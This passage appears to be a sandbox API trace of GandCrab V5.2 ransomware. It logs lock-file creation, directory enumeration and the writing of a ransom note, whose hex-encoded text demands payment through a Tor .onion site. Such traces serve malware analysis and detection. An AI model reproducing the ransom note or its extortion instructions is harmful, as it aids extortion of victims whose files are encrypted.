8\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.309] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0072.310] CloseHandle (hObject=0x2bc) returned 1 [0072.310] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.310] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.310] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x26d)) [0072.311] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.311] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.311] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.311] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\d2ca4a09d2ca4deb61a.lock") returned 83 [0072.311] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\ms project\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0072.312] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.313] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.313] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\") returned 59 [0072.313] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\*" [0072.313] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503238 [0072.313] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.313] FindNextFileW (in: hFindFile=0x503238, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.313] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.313] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.313] FindNextFileW (in: hFindFile=0x503238, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.313] lstrcmpW (lpString1="16", lpString2=".") returned 1 [0072.313] lstrcmpW (lpString1="16", lpString2="..") returned 1 [0072.313] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\", lpString2="16" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16" [0072.313] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\" [0072.313] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.314] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.314] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.314] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.314] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.314] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.314] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.314] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.315] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.315] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.315] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.315] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\\\TITWMVJL-DECRYPT.txt") returned 83 [0072.318] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\ms project\\16\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0072.319] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\